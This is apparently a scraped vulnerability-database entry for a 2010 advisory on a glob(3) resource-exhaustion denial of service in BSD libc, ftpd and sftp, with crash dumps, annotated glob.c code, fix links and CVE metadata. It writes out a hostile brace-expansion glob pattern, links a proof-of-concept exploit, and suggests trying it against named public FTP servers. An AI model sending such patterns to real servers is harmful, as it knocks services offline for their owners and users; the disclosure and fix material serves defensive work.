Jul 5 10:22:43 /netbsd: Begin traceback...
Jul 5 10:22:43 /netbsd: End traceback...
Jul 5 10:22:43 /netbsd:
Jul 5 10:22:43 /netbsd: dumping to dev 0,1 offset 8
Jul 5 10:22:43 /netbsd: dump succeeded
Jul 5 10:22:43 /netbsd:
Jul 5 10:22:43 /netbsd:
Jul 5 10:22:43 /netbsd: rebooting...
Jul 5 10:22:43 /netbsd: Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001,
2002, 2003, 2004, 2005,
- -kernel panic in netbsd502---

- -crash in openbsd47---
# ls
Segmentation fault (core dumped)

or ftpd.core

# gdb -q /usr/libexec/ftpd ftpd.core
(no debugging symbols found)
Core was generated by `ftpd'.
Program terminated with signal 11, Segmentation fault.
#0 0x0a77facb in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0x6 6
edx 0x0 0
ebx 0x18 24
esp 0xcfbc1e70 0xcfbc1e70
ebp 0xcfbc1ea8 0xcfbc1ea8
esi 0x0 0
edi 0x81f78100 -2114486016
eip 0xa77facb 0xa77facb
eflags 0x10206 66054
cs 0x2b 43
ss 0x33 51
ds 0x33 51
es 0x33 51
fs 0x33 51
gs 0x33 51
(gdb) bt
#0 0x0a77facb in ?? ()
Cannot access memory at address 0xcfbc1e70
- -crash in openbsd47---

Presented issue in localized libc, not in ftpd. Try use
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx

in ksh, openssh (sftp-server). sftp is also vulnerable. but they will kill
children process after disconnect.

"What is wrong?",

libc has no control over the computing power glob(3), good fix for this
issue, should control, how many times glob(3) will call to
*readdirfunc(),stat(2) and reducing memory usage.

- -glob.c---
...
static int
glob3(Char *pathbuf, Char *pathend, Char *pathlim, Char *pattern,
Char *restpattern, glob_t *pglob, size_t *limit)
{
struct dirent *dp;
DIR *dirp;
int error;
char buf[MAXPATHLEN];

/*
* The readdirfunc declaration can't be prototyped, because it is
* assigned, below, to two functions which are prototyped in
glob.h
* and dirent.h as taking pointers to differently typed opaque
* structures.
*/
struct dirent *(*readdirfunc)(void *);
...
/*
* Loop over pattern segments until end of pattern or until
* segment with meta character found.
*/
for (anymeta = 0;;) {
if (*pattern == EOS) { /* End of pattern? */
*pathend = EOS;
if (g_lstat(pathbuf, &sb, pglob)) <========= LIMIT
THIS CALL ===
return 0;

if (((pglob->gl_flags & GLOB_MARK) &&
...

if ((dirp = g_opendir(pathbuf, pglob)) == NULL) {
if (pglob->gl_errfunc) {
...
/* Search directory for matching names. */
if (pglob->gl_flags & GLOB_ALTDIRFUNC)
readdirfunc = pglob->gl_readdir;
else
readdirfunc = (struct dirent *(*)__P((void *))) readdir;
while ((dp = (*readdirfunc)(dirp)) != NULL) { <============= LIMIT
THIS CALL ===
...
- -glob.c---

As we can see, glob3() will call to (*readdirfunc)() and back to glob2().
glob2() will come again in glob3()... we need try control, how many times
glob will call to (*readdirfunc)() and stat().
Fix created together with NetBSD devs, should fix this problem.

- --- 2. 0day PoC ---
To sucessfully attack, we need calculate pattern. I am not going show, how
to optimal calulate pattern.
With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc.

0day remote ftpd Denial-of-Service:
http://cxib.net/stuff/glob-0day.c
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15215.c (glob-0day.c)

- --- 3. Fix ---
Oracle 25.09.2010 CET: Being fixed in main codeline

Very thanks for NetBSD project and help NetBSD project like they help you
in fixing this issue

http://netbsd.org/donations/

Fix libc/glob.c for netbsd-4,netbsd-5 branches:
http://cvsweb.be.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/gen/glob.c#rev1
.18.10.1
http://cvsweb.be.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/gen/glob.3#rev1
.30.12.1

Fix for openssh (sftp):
http://cvsweb.be.netbsd.org/cgi-bin/cvsweb.cgi/src/crypto/dist/ssh/Attic/sf
tp.c#rev1.21.6.1
http://cvsweb.be.netbsd.org/cgi-bin/cvsweb.cgi/src/crypto/dist/ssh/Attic/sf
tp-glob.c#rev1.13.12.1

http://netbsd.org/donations/
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.
asc

- --- 4. Greets ---
Special thanks for Christos Zoulas

sp3x, Infospec, Adam Zabrocki 'pi3'

- --- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJMrXeVAAoJEIO8+dzW5bUwjq4P/R//ivaNDXSjx9ANBCkAvwQE
ril6lWxNS459raFYfQBSVL+5ZScrTczKRy+dNHVoARlfS9j9RtmXvnrHuAxAkkXd
0o6ulJem5QVbrUt50sfHm78IIHu3NDRQEotrOm2HGPUjd9ehFXxkPYrpkMfzulbX
Oml2Ng5lwd50M19t2NBNycNv+0KElqLYYCD9zQhtb50ZoQHZ4G40tP3MqEiDqEAB
ZmhiKPBAhCw+sXlx5lJ37+sMPTnQusUZ5JKU73zixEs0kxqs+bdNOa2sgEl6Fixe
0Qy/tK3TDjvrJv2Nlepuhax6Dsda1EWGztppD7BXeZvd3ZIslC1Q9xJVKPZ1EQ5r
UaQmqNXrSR3eJvQS8it6Qy2anxfCkrGMuEqbBo+oKlV2dLAHPmSLRwY98KI16E96
DPqSNG6UEmXOYjROboM05vjksNg+WvqRbd/kvH3qKk5E7GEtw8v/pGK1FXc1It7f
VD6YSANhmlLliLz8OT8qFzaQ7eojEUu5xCn5Dd1er5bvtERmME1MtKctpRZBLH7I
j4cuK3l7X/yXet7jOJ/zcOND8tkX64ZBCU6VgcGnF56mWhZtbVCqFD+fVeSSqgPA
S72zTsV616YrSt78K3aMK00OD8BGlcW4NAGZ9y8/IiIHPaJFUiR+AO5fSOmFZnn9
NKv1ahQyLCmS6QCIQ4rV
=BiRC
-----END PGP SIGNATURE-----

Trust: 1.0

sources: EXPLOIT-DB: 15215

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 15215

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 15215

TYPE

Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)

Trust: 1.0

sources: EXPLOIT-DB: 15215

TAGS

tag:exploit

Trust: 3.0

tag:denial of service

Trust: 1.5

tag:proof of concept

Trust: 0.5

tag:remote

Trust: 0.5

tag:overflow

Trust: 0.5

tag:vulnerability

Trust: 0.5

sources: PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052

CREDITS

Maksymilian Arciemowicz

Trust: 0.6

sources: EXPLOIT-DB: 15215

EXTERNAL IDS

db:NVDid:CVE-2010-2632

Trust: 5.2

db:NVDid:CVE-2010-4052

Trust: 3.2

db:NVDid:CVE-2010-4051

Trust: 3.2

db:NVDid:CVE-2011-0418

Trust: 3.1

db:CERT/CCid:VU#912279

Trust: 2.2

db:SREASONid:7822

Trust: 2.1

db:CXSECURITYid:WLB-2010100135

Trust: 1.8

db:CXSECURITYid:WLB-2011050004

Trust: 1.8

db:EXPLOIT-DBid:15215

Trust: 1.6

db:CXSECURITYid:WLB-2011030145

Trust: 1.2

db:JUNIPERid:JSA10612

Trust: 1.1

db:NVDid:CVE-2011-3336

Trust: 1.0

db:EDBNETid:78100

Trust: 0.6

db:EDBNETid:38136

Trust: 0.6

db:CXSECURITYid:WLB-2013010233

Trust: 0.6

db:CXSECURITYid:WLB-2013020003

Trust: 0.6

db:EDBNETid:75213

Trust: 0.6

db:EDBNETid:63259

Trust: 0.6

db:EDBNETid:75724

Trust: 0.6

db:EDBNETid:81502

Trust: 0.6

db:PACKETSTORMid:106589

Trust: 0.5

db:PACKETSTORMid:94556

Trust: 0.5

db:PACKETSTORMid:120032

Trust: 0.5

db:CXSECURITYid:WLB-2011010121

Trust: 0.5

db:CXSECURITYid:WLB-2011110082

Trust: 0.5

db:PACKETSTORMid:125725

Trust: 0.5

db:PACKETSTORMid:97315

Trust: 0.5

db:NVDid:CVE-2010-4754

Trust: 0.5

db:NVDid:CVE-2010-4755

Trust: 0.5

db:NVDid:CVE-2010-4756

Trust: 0.5

db:PACKETSTORMid:101052

Trust: 0.5

db:BIDid:43819

Trust: 0.3

db:BIDid:47671

Trust: 0.3

sources: BID: 43819 // BID: 47671 // PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052 // EXPLOIT-DB: 15215 // EDBNET: 78100 // EDBNET: 38136 // EDBNET: 75213 // EDBNET: 63259 // EDBNET: 75724 // EDBNET: 81502

REFERENCES

url:https://www.intelligentexploit.com

Trust: 3.0

url:https://nvd.nist.gov/vuln/detail/cve-2010-2632

Trust: 2.6

url:https://nvd.nist.gov/vuln/detail/cve-2010-4052

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2010-4051

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2011-3336

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2011-0418

Trust: 1.0

url:http://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2010-008.txt

Trust: 1.0

url:http://www.sun.com/software/solaris/

Trust: 0.6

url:http://www.openbsd.org

Trust: 0.6

url:http://www.netbsd.org/

Trust: 0.6

url:https://www.exploit-db.com/exploits/15215/

Trust: 0.6

url:http://support.avaya.com/css/p8/documents/100150582

Trust: 0.3

url:http://support.avaya.com/css/p8/documents/100127892

Trust: 0.3

url:http://www.freebsd.org/

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Trust: 0.3

url:http://www.gnu.org/software/libc/

Trust: 0.3

url:http://securityreason.com/achievement_securityalert/89

Trust: 0.3

url:http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c

Trust: 0.3

url:http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29

Trust: 0.3

url:http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h

Trust: 0.3

url:http://www.securityreason.com/achievement_securityalert/97

Trust: 0.3

sources: BID: 43819 // BID: 47671 // PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052 // EXPLOIT-DB: 15215 // EDBNET: 78100 // EDBNET: 38136 // EDBNET: 75213 // EDBNET: 63259 // EDBNET: 75724 // EDBNET: 81502

SOURCES

db:BIDid:43819
db:BIDid:47671
db:PACKETSTORMid:106589
db:PACKETSTORMid:94556
db:PACKETSTORMid:120032
db:PACKETSTORMid:125725
db:PACKETSTORMid:97315
db:PACKETSTORMid:101052
db:EXPLOIT-DBid:15215
db:EDBNETid:78100
db:EDBNETid:38136
db:EDBNETid:75213
db:EDBNETid:63259
db:EDBNETid:75724
db:EDBNETid:81502

LAST UPDATE DATE

2024-03-21T15:10:28.490000+00:00


SOURCES UPDATE DATE

db:BIDid:43819date:2013-10-16T01:44:00
db:BIDid:47671date:2015-04-13T21:51:00

SOURCES RELEASE DATE

db:BIDid:43819date:2010-10-06T00:00:00
db:BIDid:47671date:2011-05-02T00:00:00
db:PACKETSTORMid:106589date:2011-11-04T15:20:33
db:PACKETSTORMid:94556date:2010-10-08T00:29:28
db:PACKETSTORMid:120032date:2013-02-02T18:11:11
db:PACKETSTORMid:125725date:2014-03-14T11:11:11
db:PACKETSTORMid:97315date:2011-01-07T22:06:47
db:PACKETSTORMid:101052date:2011-05-03T00:07:21
db:EXPLOIT-DBid:15215date:2010-10-07T00:00:00
db:EDBNETid:78100date:2014-03-14T00:00:00
db:EDBNETid:38136date:2010-10-07T00:00:00
db:EDBNETid:75213date:2013-02-01T00:00:00
db:EDBNETid:63259date:2011-11-09T00:00:00
db:EDBNETid:75724date:2013-04-11T00:00:00
db:EDBNETid:81502date:2015-09-30T00:00:00